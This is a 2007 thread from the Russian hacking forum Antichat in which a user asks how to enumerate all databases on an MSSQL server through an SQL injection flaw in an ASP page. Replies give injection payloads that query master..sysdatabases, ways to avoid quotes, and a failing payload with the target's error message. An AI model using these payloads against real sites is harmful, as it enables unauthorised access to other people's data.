Форум АНТИЧАТ - MSSQL Injection вопрос

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - MSSQL Injection вопрос (https://forum.antichat.xyz/showthread.php?t=46857)

sh-smoker

16.08.2007 15:49

MSSQL Injection вопрос

Каким методом можно получить список существующих баз данных?

+toxa+

16.08.2007 15:55

show databases;

sh-smoker

16.08.2007 16:03

Это не то. Мне через багу в скрипте надо узнать все существующие базы.

запрос типа .asp?ID=1'INJECTION

guest3297

16.08.2007 16:36

http://hack-shop.org.ru/board/showthread.php?t=24

Цитата:

select top 1 name from master..sysdatabases

sh-smoker

16.08.2007 16:55

спасибо, помог :)
Только что-то select top 2 start at 1 не пашет

на единицу ругается Incorrect syntax near '1'

ShAnKaR

16.08.2007 17:27

чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

sh-smoker

16.08.2007 17:31

Цитата:

Сообщение от ShAnKaR

чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

я знаю, но кавычки ставить нельзя.

guest3297

16.08.2007 17:58

Цитата:

select top 2 start at 1 не пашет

Запрос гласит вывести 2 строчки начиная с 1

guest3297

16.08.2007 17:59

Цитата:

я знаю, но кавычки ставить нельзя.

можно использывать order by checksum

sh-smoker

16.08.2007 19:09

-1+or+1=(select+top+1+start+at+2+name+from+master.. sysdatabases)--

ответ:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'.

/newsstory.asp, line 15

что означает, это выражение я понял, не могу понять в чем ошибка синтаксиса

Время: 15:54

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице